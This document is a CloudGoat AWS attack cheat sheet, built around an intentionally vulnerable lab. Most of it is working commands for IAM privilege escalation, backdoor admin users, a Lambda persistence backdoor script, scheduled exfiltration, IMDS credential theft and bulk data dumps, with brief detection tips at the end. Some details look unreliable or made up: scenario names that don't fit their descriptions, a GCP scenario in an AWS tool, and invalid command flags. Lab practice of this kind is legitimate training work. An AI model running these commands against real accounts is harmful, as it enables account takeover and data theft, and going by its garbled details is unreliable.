CloudGoat
CloudGoat is an AWS security vulnerability assessment framework that creates intentionally vulnerable AWS environments. It provides hands-on CTF-style scenarios targeting IAM misconfigurations, Lambda exploitation, S3 exposure, and AWS service abuse.
Installation and Setup
Prerequisites
# System requirements
- Python 3.6+
- AWS CLI v2
- Terraform
- Git
- AWS Account with API access
# Install pip packages
pip install boto3 botocore
# Configure AWS credentials
aws configure
# Or set environment variables:
export AWS_ACCESS_KEY_ID="AKIAIOSFODNN7EXAMPLE"
export AWS_SECRET_ACCESS_KEY="wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY"
Install CloudGoat
# Clone repository
git clone https://github.com/rhinosecuritylabs/cloudgoat.git
cd cloudgoat
# Install Python dependencies
pip install -r requirements.txt
# Configure AWS profile
export AWS_PROFILE=default
# Display available scenarios
python cloudgoat.py --help
# List all scenarios
python cloudgoat.py scenarios
Create and Destroy Scenarios
# Create scenario with default configuration
python cloudgoat.py create cgidp
# Create with custom name
python cloudgoat.py create --scenario-name cgidp --profile-name my-test
# Destroy scenario (cleanup)
python cloudgoat.py destroy --profile-name my-test
# List all created stacks
python cloudgoat.py list
# Check scenario status
aws cloudformation list-stacks --profile default
CloudGoat Scenarios
cgidp (Insecure Direct Object Reference via IAM)
# Objective: Exploit IDOR vulnerability in Lambda to escalate privileges
# 1. Enumerate initial access
aws iam get-user
# 2. List Lambda functions
aws lambda list-functions
# 3. Invoke vulnerable Lambda
aws lambda invoke --function-name vulnerable_function \
--payload '{"user_id":"1"}' response.json
# 4. Change payload to enumerate other users
aws lambda invoke --function-name vulnerable_function \
--payload '{"user_id":"2"}' response.json
# 5. Extract credentials from Lambda environment
aws lambda get-function --function-name vulnerable_function
# 6. Use exposed credentials
export AWS_ACCESS_KEY_ID="exposed_key"
export AWS_SECRET_ACCESS_KEY="exposed_secret"
aws iam get-user
cgecraudience (ECR Repository Public Access)
# Objective: Pull and exploit container images from ECR
# 1. Enumerate ECR repositories
aws ecr describe-repositories
# 2. Get authorization token
aws ecr get-authorization-token
# 3. List images in repository
aws ecr list-images --repository-name vulnerable-app
# 4. Get image URI
aws ecr describe-images --repository-name vulnerable-app
# 5. Pull container image locally
docker pull <account-id>.dkr.ecr.<region>.amazonaws.com/vulnerable-app:latest
# 6. Extract secrets from image layers
docker inspect <image-id>
docker history <image-id> --no-trunc
# 7. Find hardcoded credentials
strings <image-file> | grep -i key
cgstxs3 (S3 Exposure via Incorrect Permissions)
# Objective: Access sensitive files in misconfigured S3 bucket
# 1. List accessible S3 buckets
aws s3 ls
# 2. Check bucket permissions
aws s3api get-bucket-acl --bucket vulnerable-bucket
# 3. List bucket contents
aws s3 ls s3://vulnerable-bucket/ --recursive
# 4. Download sensitive files
aws s3 cp s3://vulnerable-bucket/secrets.txt .
# 5. Check bucket policy
aws s3api get-bucket-policy --bucket vulnerable-bucket
# 6. Extract credentials from files
cat secrets.txt | grep -i key
IAM Privilege Escalation Techniques
Assume Role Exploitation
# 1. List available IAM roles
aws iam list-roles
# 2. Check trust relationships
aws iam get-role --role-name vulnerable-role
# 3. Check if current user can assume role
aws sts assume-role --role-arn arn:aws:iam::123456789012:role/vulnerable-role \
--role-session-name exploitation
# 4. Use assumed role credentials
export AWS_ACCESS_KEY_ID="assumed_key"
export AWS_SECRET_ACCESS_KEY="assumed_secret"
export AWS_SESSION_TOKEN="session_token"
# 5. List resources accessible to assumed role
aws s3 ls
aws ec2 describe-instances
# 6. Extract more credentials
aws iam list-users
aws iam list-access-keys --user-name admin
Policy Attachment Abuse
# 1. Check user inline policies
aws iam list-user-policies --user-name current-user
# 2. Get policy details
aws iam get-user-policy --user-name current-user --policy-name vulnerable-policy
# 3. Check managed policies
aws iam list-attached-user-policies --user-name current-user
# 4. If policy allows, create new IAM user
aws iam create-user --user-name backdoor
# 5. Create access keys for backdoor user
aws iam create-access-key --user-name backdoor
# 6. Attach admin policy
aws iam attach-user-policy --user-name backdoor \
--policy-arn arn:aws:iam::aws:policy/AdministratorAccess
# 7. Use backdoor credentials
export AWS_ACCESS_KEY_ID="backdoor_key"
export AWS_SECRET_ACCESS_KEY="backdoor_secret"
STS Token Exploitation
# 1. Get security token service information
aws sts get-caller-identity
# 2. If STS permissions allow, create tokens
aws sts get-session-token --duration-seconds 3600
# 3. Use temporary credentials
export AWS_ACCESS_KEY_ID="temp_key"
export AWS_SECRET_ACCESS_KEY="temp_secret"
export AWS_SESSION_TOKEN="temp_token"
# 4. Access resources with temporary credentials
aws ec2 describe-instances
aws s3 ls
Lambda and Serverless Exploitation
Lambda Environment Variable Extraction
# 1. List Lambda functions
aws lambda list-functions
# 2. Get function configuration
aws lambda get-function-configuration --function-name vulnerable-function
# 3. Extract environment variables
aws lambda get-function --function-name vulnerable-function | grep -A5 Environment
# 4. Look for credentials in environment
# Common variable names: DB_PASSWORD, API_KEY, SECRET, AWS_SECRET_ACCESS_KEY
# 5. If accessible, invoke function and observe errors
aws lambda invoke --function-name vulnerable-function \
--payload '{"test":"payload"}' response.json
# 6. Extract credentials from CloudWatch logs
aws logs describe-log-groups
aws logs describe-log-streams --log-group-name /aws/lambda/vulnerable-function
aws logs get-log-events --log-group-name /aws/lambda/vulnerable-function \
--log-stream-name 'log-stream-name'
Lambda Layer Exploitation
# 1. List Lambda layers
aws lambda list-layers
# 2. Get layer version details
aws lambda get-layer-version --layer-name vulnerable-layer --version-number 1
# 3. Download layer archive
aws lambda get-layer-version --layer-name vulnerable-layer --version-number 1 \
--query 'Content.Location' --output text | xargs curl -o layer.zip
# 4. Extract and analyze
unzip layer.zip
find . -name "*.py" -o -name "*.sh" -o -name "*.conf"
# 5. Search for hardcoded secrets
grep -r "key\|password\|secret\|token" --include="*.py" --include="*.sh"
Lambda Role Assumption
# 1. Get Lambda execution role ARN
aws lambda get-function-configuration --function-name vulnerable-function \
| grep Role
# 2. List policies attached to role
aws iam list-attached-role-policies --role-name lambda-execution-role
# 3. Get inline policies
aws iam list-role-policies --role-name lambda-execution-role
# 4. Check if role can be assumed from outside
aws sts assume-role --role-arn arn:aws:iam::123456789012:role/lambda-execution-role \
--role-session-name exploitation
# 5. If successful, use assumed role to access other resources
export AWS_ACCESS_KEY_ID="key"
export AWS_SECRET_ACCESS_KEY="secret"
aws s3 ls
aws dynamodb list-tables
Data Exfiltration Techniques
S3 Bucket Data Extraction
# 1. Identify accessible buckets
aws s3 ls
# 2. Check bucket versioning (retrieve deleted objects)
aws s3api get-bucket-versioning --bucket vulnerable-bucket
# 3. List all versions including deleted
aws s3api list-object-versions --bucket vulnerable-bucket
# 4. Download specific file version
aws s3api get-object --bucket vulnerable-bucket --key secretfile.txt \
--version-id version-id secretfile.txt
# 5. Download entire bucket
aws s3 sync s3://vulnerable-bucket . --recursive
# 6. Compress and exfiltrate
tar -czf exfil.tar.gz /tmp/downloaded_data
RDS Database Access
# 1. List RDS instances
aws rds describe-db-instances
# 2. Get DB endpoint and port
aws rds describe-db-instances --db-instance-identifier vulnerable-db \
| grep -E "Endpoint|Port"
# 3. Get DB credentials from Secrets Manager
aws secretsmanager list-secrets
aws secretsmanager get-secret-value --secret-id rds-credentials
# 4. Connect to RDS
mysql -h endpoint -u user -ppassword -D database
# 5. Dump database
mysqldump -h endpoint -u user -ppassword database > database_dump.sql
DynamoDB Exploitation
# 1. List DynamoDB tables
aws dynamodb list-tables
# 2. Get table schema
aws dynamodb describe-table --table-name vulnerable-table
# 3. Scan table for all items
aws dynamodb scan --table-name vulnerable-table
# 4. Export to JSON
aws dynamodb scan --table-name vulnerable-table > table_dump.json
# 5. If large table, use pagination
aws dynamodb scan --table-name vulnerable-table --max-items 100 \
--starting-token token
EC2 and Compute Exploitation
EC2 Instance Metadata Service (IMDS) Exploitation
# 1. From compromised EC2 instance, access IMDS
curl http://169.254.169.254/latest/meta-data/
# 2. Get IAM role name
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/
# 3. Get IAM role credentials
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/role-name
# 4. Extract access key, secret key, and token
# Use these credentials for further exploitation
# 5. IMDSv2 (more secure, but sometimes accessible)
TOKEN=$(curl -X PUT http://169.254.169.254/latest/api/token -H "X-aws-ec2-metadata-token-ttl-seconds: 21600")
curl -H "X-aws-ec2-metadata-token: $TOKEN" http://169.254.169.254/latest/meta-data/
EC2 Security Group Abuse
# 1. List EC2 instances
aws ec2 describe-instances
# 2. Get security group IDs
aws ec2 describe-security-groups
# 3. If permissions allow, modify security groups
aws ec2 authorize-security-group-ingress --group-id sg-xxxxxxxx \
--protocol tcp --port 22 --cidr 0.0.0.0/0
# 4. Now can SSH into instances
ssh -i key.pem ubuntu@ec2-instance.compute.amazonaws.com
# 5. Once inside, check for IAM role credentials
curl http://169.254.169.254/latest/meta-data/iam/security-credentials/role-name
EC2 AMI and Snapshot Extraction
# 1. List available AMIs
aws ec2 describe-images --owners self
# 2. List snapshots
aws ec2 describe-snapshots --owner-ids self
# 3. Create volume from snapshot
aws ec2 create-volume --snapshot-id snap-xxxxxxxx --availability-zone us-east-1a
# 4. Attach to instance
aws ec2 attach-volume --volume-id vol-xxxxxxxx --instance-id i-xxxxxxxx --device /dev/sdf
# 5. Mount and access
sudo mkdir /mnt/snapshot
sudo mount /dev/nvme1n1 /mnt/snapshot
ls -la /mnt/snapshot
Persistence and Backdoors
IAM User Backdoor
# 1. Create new IAM user
aws iam create-user --user-name backdoor-admin
# 2. Create access keys
aws iam create-access-key --user-name backdoor-admin
# 3. Attach admin policy
aws iam attach-user-policy --user-name backdoor-admin \
--policy-arn arn:aws:iam::aws:policy/AdministratorAccess
# 4. Store credentials securely
# Save access key and secret key for later use
Lambda Persistence
# 1. Create Lambda function with backdoor code
cat > backdoor.py << 'EOF'
import boto3
import json
def lambda_handler(event, context):
# Create new admin user on invocation
iam = boto3.client('iam')
iam.create_user(UserName='pwned')
iam.create_access_key(UserName='pwned')
iam.attach_user_policy(
UserName='pwned',
PolicyArn='arn:aws:iam::aws:policy/AdministratorAccess'
)
return {'statusCode': 200}
EOF
# 2. Create execution role
aws iam create-role --role-name lambda-backdoor-role \
--assume-role-policy-document '{...}'
# 3. Deploy function
zip backdoor.zip backdoor.py
aws lambda create-function --function-name backdoor \
--runtime python3.9 --role arn:aws:iam::123456789012:role/lambda-backdoor-role \
--handler backdoor.lambda_handler --zip-file fileb://backdoor.zip
# 4. Set up CloudWatch event to trigger periodically
aws events put-rule --name daily-backdoor --schedule-expression "rate(1 day)"
EventBridge Scheduled Backdoor
# 1. Create SNS topic for exfiltration
aws sns create-topic --name backdoor-exfil
# 2. Create EventBridge rule
aws events put-rule --name exfil-schedule --schedule-expression "rate(1 hour)"
# 3. Add Lambda target
aws events put-targets --rule exfil-schedule \
--targets "Id"="1","Arn"="arn:aws:lambda:...:function:exfil"
Enumeration and Reconnaissance
AWS Account Information
# Get account ID
aws sts get-caller-identity
# Get current user/role
aws sts get-caller-identity | grep Arn
# Get account aliases
aws iam list-account-aliases
# Get account password policy
aws iam get-account-password-policy
# Get account summary
aws iam get-account-summary
IAM Enumeration
# List all users
aws iam list-users
# List all groups
aws iam list-groups
# List all roles
aws iam list-roles
# Get details on specific user
aws iam get-user --user-name username
# List user's groups
aws iam list-groups-for-user --user-name username
# List user's attached policies
aws iam list-attached-user-policies --user-name username
# List user's inline policies
aws iam list-user-policies --user-name username
# Get policy details
aws iam get-user-policy --user-name username --policy-name policy-name
Cross-Account Access Detection
# List trust relationships
aws iam get-role --role-name target-role | grep AssumeRolePolicyDocument
# Check for external account principals
aws iam get-role --role-name target-role | grep -i "Principal"
# List all roles with cross-account access
for role in $(aws iam list-roles --query 'Roles[].RoleName' --output text); do
aws iam get-role --role-name $role --query 'Role.AssumeRolePolicyDocument' | grep -q 'AWS' && echo "Cross-account: $role"
done
Available Scenarios
| Scenario | Difficulty | Objective |
|---|---|---|
| cgidp | Beginner | Exploit IAM identity for privilege escalation |
| cgecraudience | Beginner | Pull and analyze ECR container images |
| cgstxs3 | Beginner | Access misconfigured S3 bucket |
| cgstorageenum | Intermediate | Enumerate and exploit storage services |
| cgkinesisvideostream | Intermediate | Exploit Kinesis video stream permissions |
| rce_web_containers | Intermediate | RCE through Lambda environment variables |
| bastionhost | Intermediate | Lateral movement via bastion host |
| immoral_blue_rabbit | Intermediate | Complex multi-service exploitation |
| vulnerable_flask_app | Advanced | Web application exploitation in AWS |
| pac-man-gcp | Advanced | GCP-specific attack scenarios |
CloudGoat Exploitation Workflow
Step 1: Environment Setup
# Clone and setup
git clone https://github.com/rhinosecuritylabs/cloudgoat.git
cd cloudgoat
pip install -r requirements.txt
# Configure AWS
aws configure
export AWS_PROFILE=default
Step 2: Scenario Creation
# List available scenarios
python cloudgoat.py scenarios
# Create specific scenario
python cloudgoat.py create cgidp --profile-name test-cgidp
# Extract credentials from scenario output
Step 3: Exploitation
# Set initial credentials
export AWS_ACCESS_KEY_ID="initial_key"
export AWS_SECRET_ACCESS_KEY="initial_secret"
# Enumerate
aws iam get-user
aws iam list-roles
aws lambda list-functions
# Exploit vulnerability
# (varies by scenario)
# Extract credentials
# (varies by scenario)
Step 4: Privilege Escalation
# Use new credentials
export AWS_ACCESS_KEY_ID="escalated_key"
export AWS_SECRET_ACCESS_KEY="escalated_secret"
# Repeat enumeration
aws iam list-users
aws s3 ls
# Continue escalation chain
Step 5: Cleanup
# Destroy scenario when done
python cloudgoat.py destroy --profile-name test-cgidp
# Verify cleanup
aws cloudformation list-stacks --profile default
Detection and Logging
CloudTrail Monitoring
# Enable CloudTrail
aws cloudtrail create-trail --name cloudtrail-monitoring --s3-bucket-name trail-bucket
# View CloudTrail events
aws cloudtrail lookup-events --lookup-attributes AttributeKey=ResourceName,AttributeValue=vulnerable-role
# Find suspicious activity
aws cloudtrail lookup-events --lookup-attributes AttributeKey=EventName,AttributeValue=CreateAccessKey
aws cloudtrail lookup-events --lookup-attributes AttributeKey=EventName,AttributeValue=AttachUserPolicy
aws cloudtrail lookup-events --lookup-attributes AttributeKey=EventName,AttributeValue=AssumeRole
CloudWatch Log Analysis
# Create metric filter for suspicious activity
aws logs put-metric-filter --log-group-name /aws/lambda/logs \
--filter-name UnauthorizedAPICalls \
--filter-pattern '{ ($.errorCode = "*UnauthorizedOperation") || ($.errorCode = "AccessDenied*") }'
# View log streams
aws logs describe-log-streams --log-group-name /aws/lambda/logs
# Get specific logs
aws logs get-log-events --log-group-name /aws/lambda/logs \
--log-stream-name log-stream-name
Best Practices for CloudGoat
- Use separate AWS accounts for testing
- Enable CloudTrail and CloudWatch logging before scenarios
- Document all findings in each scenario
- Practice both attack and defense perspectives
- Review AWS security best practices after each scenario
- Compare exploits across different tools
- Test remediation measures
- Keep credentials secure and rotate regularly
- Destroy scenarios immediately after completion
- Use least privilege for CloudGoat execution role